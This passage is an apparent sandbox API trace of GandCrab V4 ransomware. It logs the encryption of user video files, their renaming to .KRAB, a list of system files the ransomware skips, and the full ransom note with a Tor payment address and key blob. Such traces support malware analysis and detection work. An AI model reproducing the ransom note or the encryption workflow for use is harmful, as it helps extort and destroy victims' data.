hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.714] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.714] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.714] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0099.715] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.715] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.715] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.715] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.715] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0099.715] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.716] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10112c0) returned 1 [0099.716] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.716] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.716] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.717] GetLastError () returned 0x0 [0099.717] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.717] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0099.717] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10110a0) returned 1 [0099.717] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.717] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.717] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.718] GetLastError () returned 0x0 [0099.718] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.718] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0099.718] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Yu_oR_Jf.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\yu_or_jf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.718] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.718] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.719] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x5880, lpOverlapped=0x0) returned 1 [0099.731] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffa780, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.731] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x5880, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x5880, lpOverlapped=0x0) returned 1 [0099.731] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.731] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.735] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.735] CloseHandle (hObject=0x434) returned 1 [0099.736] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.736] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Yu_oR_Jf.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\yu_or_jf.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Yu_oR_Jf.mkv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\yu_or_jf.mkv.krab")) returned 1 [0099.737] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.737] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.737] lstrcmpW (lpString1="Z2dB.flv", lpString2=".") returned 1 [0099.737] lstrcmpW (lpString1="Z2dB.flv", lpString2="..") returned 1 [0099.737] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="Z2dB.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Z2dB.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Z2dB.flv" [0099.737] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.738] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Z2dB.flv.KRAB") returned 42 [0099.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Z2dB.flv") returned 37 [0099.738] lstrlenW (lpString=".flv") returned 4 [0099.738] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.738] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".flv ") returned 5 [0099.738] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Z2dB.flv") returned 37 [0099.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Z2dB.flv") returned 37 [0099.738] lstrcmpiW (lpString1="Z2dB.flv", lpString2="desktop.ini") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="autorun.inf") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="ntuser.dat") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="iconcache.db") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="bootsect.bak") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="boot.ini") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="ntuser.dat.log") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="thumbs.db") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="KRAB-DECRYPT.html") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="ntldr") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="NTDETECT.COM") returned 1 [0099.739] lstrcmpiW (lpString1="Z2dB.flv", lpString2="Bootfont.bin") returned 1 [0099.739] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.739] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10114e0) returned 1 [0099.740] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.740] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.740] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.741] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.741] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0099.741] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.741] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0099.741] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.742] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.742] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.742] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.742] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.742] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.742] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0099.743] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.743] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.743] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.743] GetLastError () returned 0x0 [0099.743] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.745] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0099.745] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10114e0) returned 1 [0099.745] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0099.745] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.745] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.746] GetLastError () returned 0x0 [0099.746] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0099.746] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0099.746] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Z2dB.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\z2db.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.746] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.747] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.747] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xda64, lpOverlapped=0x0) returned 1 [0099.760] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff259c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.760] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xda64, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xda64, lpOverlapped=0x0) returned 1 [0099.761] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.761] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.764] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.765] CloseHandle (hObject=0x434) returned 1 [0099.765] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.765] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Z2dB.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\z2db.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\Z2dB.flv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\z2db.flv.krab")) returned 1 [0099.766] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.766] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0099.766] FindClose (in: hFindFile=0xfbd5a0 | out: hFindFile=0xfbd5a0) returned 1 [0099.766] CloseHandle (hObject=0x320) returned 1 [0099.767] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0 [0099.767] FindClose (in: hFindFile=0xfbe0e0 | out: hFindFile=0xfbe0e0) returned 1 [0099.767] CloseHandle (hObject=0x368) returned 1 [0099.767] FindNextFileW (in: hFindFile=0xfbe060, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0099.767] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0099.767] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0099.767] lstrcatW (in: lpString1="C:\\Users\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\d2ca4a08d2ca4dee3d.lock" [0099.767] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.768] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 37 [0099.768] lstrlenW (lpString="C:\\Users\\d2ca4a08d2ca4dee3d.lock") returned 32 [0099.768] lstrlenW (lpString=".lock") returned 5 [0099.768] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.768] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0099.768] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.768] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.769] FindNextFileW (in: hFindFile=0xfbe060, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0099.769] lstrcmpW (lpString1="Default", lpString2=".") returned 1 [0099.769] lstrcmpW (lpString1="Default", lpString2="..") returned 1 [0099.769] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0099.769] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0099.769] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0099.769] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0099.769] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0099.769] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0099.769] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0099.769] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.770] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.770] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\\\KRAB-DECRYPT.txt") returned 34 [0099.770] CreateFileW (lpFileName="C:\\Users\\Default\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0099.771] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0099.771] WriteFile (in: hFile=0x368, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f4a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f4a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0099.771] CloseHandle (hObject=0x368) returned 1 [0099.771] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.772] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.772] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2e, wMilliseconds=0x3c6)) [0099.772] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.772] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0099.772] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0099.773] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\d2ca4a08d2ca4dee3d.lock") returned 40 [0099.773] CreateFileW (lpFileName="C:\\Users\\Default\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x368 [0099.773] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.773] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.774] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0099.774] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\*") returned="C:\\Users\\Default\\*" [0099.774] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*", lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0xfbe0e0 [0099.774] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0099.774] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0099.778] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0099.778] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0099.778] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0099.778] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0099.778] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0099.778] lstrcatW (in: 